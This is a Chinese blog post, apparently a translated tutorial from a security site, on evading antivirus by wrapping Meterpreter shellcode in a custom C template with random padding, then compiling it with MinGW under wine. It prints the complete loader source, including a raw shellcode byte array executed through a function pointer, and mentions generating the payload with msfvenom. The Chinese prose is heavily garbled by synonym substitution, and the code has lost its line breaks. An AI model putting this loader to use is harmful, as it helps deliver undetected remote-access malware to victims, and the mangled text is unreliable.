|
|
|
联系客服020-83701501

那些年一起绕过的杀软

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
那些年一起绕过的杀软

小编以作者的身份来译文,澄清!小编并非基佬!!

 

无理论的渗透测试中,你创举了一大堆充满各种漏洞的主机.此时你花了大量的光阴光阴来搜集关于这些主机的动态和谍报…下一步,你洗清洁屁股,筹办大干一场. ╮( ̄▽ ̄)╭?跟平凡的黑阔基佬一样,没错,本基love用meterpreter 作为 payload。只因meterpreter提供好了良多好玩又未便的函数. ?我和我的基友们曾经撸开了Metasploit, 为目尺度备好了小皮鞭与烛炬(exploit ), 目送着我的payload上传到指标机子上,但欢娱剧的是:指标板滞竟然一点反响反映也不有,莫非是性稀薄?!!

毕竟发生了什么问题呢? 好吧,邃晓是很多中央均可能出现一致错误, 漏洞操作脚本的版本一致错误、 exp不有责任, 等等. ?然而当你创举每一个关键都不有出现一致错误时, 那最大的可能便是反病毒软件拦截了你的meterpreter payload啦。?本基就经常碰着过这种事——当我裤子曾经脱了,下去的却是居委扫黄小组的大妈…(>﹏<)当卖命过无数次大妈的踩踏以后,本基决定确定研究绕过手艺,刻下当今把欺骗绕过杀毒软件手艺公诸于众,让各位机油过上性福的生存..….

起首,我要感谢这两篇我本文引用的文章(毗连请见下文). 这两篇文章给了我很大的开发,本文一些源代码凡是在这两篇文章中摘录,读者们或是自行研究这两篇文章,说不定会有更多的播种哟。

一个绕过杀毒软件的体式样式是:为meterpreter创建一个可执行的“定制”模板 . 你或是独霸如下的代码来作为你这个模板的根蒂基础底细 (来吧,骚年!亮出你最特长的编辑器,并创建文件“base.c”, 让我们哄哄烈烈地干一场吧):

 

Default
123456789101112 // This should be random paddingunsigned char padding[]= ; // Our Meterpreter code goes hereunsigned char payload[]= ; // Push Meterpreter into memoryint main(void) { ((void (*)())payload)();}

 

当毛躁毛躁的代码创建结束后, 第一件事变呢,便是要天生大随机数来补救我们文件的结尾一小块啦。我们天生大随机数的语句号令如下文所示。?你能繁杂地定制大随机数的长度,如下文的”-c 1028”,此时将天生一个1028位的大随机数。

我们的号令和输出看下去会像是下面这个容貌:

bypass1

“Ctrl+C”、“Ctrl+V”这个大随机数进入我们的 base.c 文件里,这个大随机数粘贴的位置相通下文:

 

Default
123456789101112 // This should be random paddingunsigned char padding[]="F9d9CxkqvLlodqpws5x4KoI3KoLdcLTae-0DMrcDZiscZi7Gmzug6g1n8L_W6pzPR-bGsm74TBHy3GDof6o-cMIAaiF5nEvEadpxl9p94w12fiLDreuEjLLhW2QXFbKBAIWOKXvMoiBGZHZY4Lyk24HTPuTonrTbf__hZ0G_q_5DVXfKU0s-muqroz-U6j-wDrX2CzKapy8o1Y5zGo0T3BozAuzwe7Q1A-R4JIWEU8LR-8MJrlF5ZthMo4M661VM8-6CY7duKz29tiPr5IEtpYXBVJyhHYCsPd5iVrNc3wzSVQ6jP9dht-znpNi4-wqWVjKng_3j5WjOlva3_jqLcqkMQ5NfrT7ipYlqxvqgYMUU8rvo9PS_DVkA3tM0W1T6BXLE7nmvZmxojfwfNKQEzzCn1-tYyqcd1z1UTnGEIoZp2sHY-kgofDDnHbNk-4-oMQdwuBt56oCWh7jcNwokcpte26FLJBX4C-yM46CJUlNFrgBg28776xxlTyC02Hs-YdkR-rJNvTt3OWOdCNt-1ocoj20QskIVdv2_XZgrTnxyIEOBBYrrmKHgBq4Qvd816iK1Ua2ZymTVRov1qJeiqvIoCr-hufUkQGjMCCGGSAjPacemgU3ztZZZJIPpB7Dc_zIpkSsaCr0kpDz9lFPn-Fn--cQh2l2gUIA8eiMHFeMLDh40da83tfThQqd_MsGb2OL2LmGCpV_QUdbFecP6-eI80sZG34j9Z3ur_6blZbu1f1qjME-bJKJ2ueT0arvydnnfzHIOt-vt26f0cBeE_11hUiTYmhtH9U4Mppe-eVMUJ5E3XU-Q-20-qCZZBWGV0kK4Lpxu8QGI_NrkRcS3CEantKhUkIaxxXWZRJvk0uEcB_YHerHjZT6Fw8_omY8O2BLT5sAg7f-MQm1P8RfTXYILiTbaqzxvg44y8zdEQpzPY4bgy3svNFVheIseFmOPKs-jL5eJkOlrkvniKFwCKatGKF8Aewli1sYmLP3HKVK8Voy-7b-j377x-SMQKUyByz9F"; // Our Meterpreter code goes hereunsigned char payload[]= ; // Push Meterpreter into memoryint main(void) { ((void (*)())payload)();}

 

当随机数弄好以后,接下来便是我们的 meterpreter shellcode啦. 什么?你不会写?没干系!Msfvenom在手,shellcode 我有! 用本基下面的号令,再变动一下payload的名称,妈妈再也没必要担心我的shellcode:

 

bypass2

 

当我们的 meterpreter shellcode创建结束后, 再次像大随机数一样,复制粘贴进我们的base.c 文件里.当你完成以后,你的base.c文件看起来理应像下面的一样:

 

Default
1234567891011121314151617181920212223242526272829303132333435 // This should be random paddingunsigned char padding[]="F9d9CxkqvLlodqpws5x4KoI3KoLdcLTae-0DMrcDZiscZi7Gmzug6g1n8L_W6pzPR-bGsm74TBHy3GDof6o-cMIAaiF5nEvEadpxl9p94w12fiLDreuEjLLhW2QXFbKBAIWOKXvMoiBGZHZY4Lyk24HTPuTonrTbf__hZ0G_q_5DVXfKU0s-muqroz-U6j-wDrX2CzKapy8o1Y5zGo0T3BozAuzwe7Q1A-R4JIWEU8LR-8MJrlF5ZthMo4M661VM8-6CY7duKz29tiPr5IEtpYXBVJyhHYCsPd5iVrNc3wzSVQ6jP9dht-znpNi4-wqWVjKng_3j5WjOlva3_jqLcqkMQ5NfrT7ipYlqxvqgYMUU8rvo9PS_DVkA3tM0W1T6BXLE7nmvZmxojfwfNKQEzzCn1-tYyqcd1z1UTnGEIoZp2sHY-kgofDDnHbNk-4-oMQdwuBt56oCWh7jcNwokcpte26FLJBX4C-yM46CJUlNFrgBg28776xxlTyC02Hs-YdkR-rJNvTt3OWOdCNt-1ocoj20QskIVdv2_XZgrTnxyIEOBBYrrmKHgBq4Qvd816iK1Ua2ZymTVRov1qJeiqvIoCr-hufUkQGjMCCGGSAjPacemgU3ztZZZJIPpB7Dc_zIpkSsaCr0kpDz9lFPn-Fn--cQh2l2gUIA8eiMHFeMLDh40da83tfThQqd_MsGb2OL2LmGCpV_QUdbFecP6-eI80sZG34j9Z3ur_6blZbu1f1qjME-bJKJ2ueT0arvydnnfzHIOt-vt26f0cBeE_11hUiTYmhtH9U4Mppe-eVMUJ5E3XU-Q-20-qCZZBWGV0kK4Lpxu8QGI_NrkRcS3CEantKhUkIaxxXWZRJvk0uEcB_YHerHjZT6Fw8_omY8O2BLT5sAg7f-MQm1P8RfTXYILiTbaqzxvg44y8zdEQpzPY4bgy3svNFVheIseFmOPKs-jL5eJkOlrkvniKFwCKatGKF8Aewli1sYmLP3HKVK8Voy-7b-j377x-SMQKUyByz9F"; // Our Meterpreter code goes hereunsigned char payload[]=“\xba\xd7\x0c\xb4\xfa\xd9\xc1\xd9\x74\x24\xf4\x58\x2b\xc9\xb1″“\x57\x83\xe8\xfc\x31\x50\x0e\x03\x87\x02\x56\x0f\xfd\xca\x4f”“\x84\x25\x19\xd5\x05\x4e\x2c\x7c\x9b\xb9\x67\x30\x73\x88\x22″“\x2b\x77\xbf\xd4\xc8\xb2\x5b\x6c\xf6\xd2\xd0\x3a\x54\xb7\xb6″“\x6a\xd0\x10\xc4\xae\x92\xb7\x9b\xb4\x9c\x02\x72\xea\xfe\x1d”“\xb9\x31\xbf\x3e\x09\xf5\x69\x25\xcb\x31\x56\x43\x8b\xec\xfe”“\xd1\xbf\xad\x50\x7e\x8f\x9d\x5f\x13\xb8\xd6\x4a\x03\xfc\xb1″“\x89\x08\x6f\xf9\x35\x3b\x1a\xd3\xf7\xe5\x50\x13\x0a\x0b\xc3″“\x87\x34\x9c\x4c\x4b\xcf\xbf\x01\x20\x45\x85\x8e\x82\x1c\x0c”“\xfa\x47\xa6\x03\xef\x16\xbd\xe9\x99\x87\xa9\xa9\x75\xf6\x6d”“\x6c\x43\xa8\xd9\xd0\x18\xb4\xd1\x93\x18\xf1\x3f\x08\xd0\xe3″“\x7a\x66\x1e\x90\x70\x90\xc3\x01\x61\xaf\xb4\xc0\x1e\xd8\x6d”“\xb7\x88\xfa\x7b\x2d\x75\x2f\xea\xda\x22\x2f\x26\x7a\x7c\x4e”“\x0a\xb8\x7a\xac\x1b\x74\x17\x3c\x92\x18\x6d\x67\xb3\x01\xb1″“\x4a\x43\xe4\x72\xf8\x15\xf8\x4b\x4a\xfb\x65\xbb\xf2\x6f\xe9″“\x9f\x58\x6b\xcd\x96\x7b\x80\xa9\xfe\xa6\x2e\xf7\xfa\xf5\x1d”“\xc5\xd4\x3d\x73\xe2\xd2\x94\xce\x85\x35\x62\xc4\xb9\x1b\x87″“\x20\x46\x16\xa6\xa4\xc2\x74\xfc\x5c\xfb\x83\x8b\x60\x4a\xd1″“\x72\x48\xab\xd7\xd9\x86\x7f\x2b\xbb\x06\x74\x54\xf0\xb6\xb8″“\xa8\x16\x97\xa2\xba\xc3\x79\x6f\xab\xdd\x6f\x3c\x74\x6c\xf4″“\x9d\xcc\x34\x84\xef\x34\x0c\x78\xc1\xe9\x2e\x57\xf6\x73\x9f”“\x12\x58\x6f\x48\xb5\x04\x45\x13\x86\x3c\xbb\xab\xce\x8a\x15″“\x07\x65\x73\x0e\x50\xd1\xa2\x29\x6b\x46\x3b\x40\x9c\x56\x1a”“\xb6\x8d\x22\x16\x66\x2f\xa8\x03\xdc\x58\x48\x91\x44\x18\xd9″“\x1d\xb6\x0f\xfe\xca\x7b\x03\xd1\x94\x54\xba”;// Push Meterpreter into memoryint main(void) { ((void (*)())payload)();}

 

祝贺!你曾经制作出了一个至关漂白的模板了. ?刻下当今, 我们要干的只有编译它了. 我loveBacktrack里wine搭载的gcc.exe 编译步骤.先切换目录到编译器地点的目录 ( /root/.wine/drive_c/MinGW/bin/gcc.exe), 通过wine调用编译器而且提供应他源代码和输出的门路, 如下图所示:

bypass3

再一次祝贺你. 刻下当今,就让那一群扫黄的大妈们颤抖吧,你刻下当今曾经能过很多杀毒软件啦!然而…小编做履行的后果是…360过不了…QQ管家也过不了,就金山毒霸过了(掩面而泣啊)……

啊啊啊,悍然这么繁杂的免杀是过不了的,然而你以为这是全数,NONONO!。

欲知后事如何,请存眷后续文章:《好免杀,hyperion造》

 

91ri.org:本文是团队新染指的小编翻译的,个人感到翻译的很不错,尽管文章很口头化而且形式较”银弹”,不过个人极度love。个人感到岂论是翻译大约原创都该写出自己的作风,好的文章必须具备的条件之一是:让人看得懂。而精良的文章则是那种让人看的雀跃的又能让人从中学到器材的文章。

月巴小编这次不单翻译出了原文的意思,更有自己的思路想法,更好的中央是译出了91ri的”银弹”作风。:)

AD:网络安全攻防研究室团队在近期内筹办再招募3-4名团队成员,欢送一直在存眷着我们网站且欢喜与我们一起阻滞的友人或是点此查抄染指我们的体式样式:染指我们

原文LINK:https://www.christophertruncer.com/bypass-antivirus-with-meterpreter-as-the-payload-hyperion-fun

参考原料:http://www.whenisfive.com/2011/12/12/creating-custom-meterpreter-exe-templates-to-bypass-windows-av

http://e-spohn.com/blog/2012/08/02/pe-crypters-hyperion

本文由网络安全攻防研究室(91ri.org)原创翻译并履行、转载请注明来由!

数安新闻+更多

证书相关+更多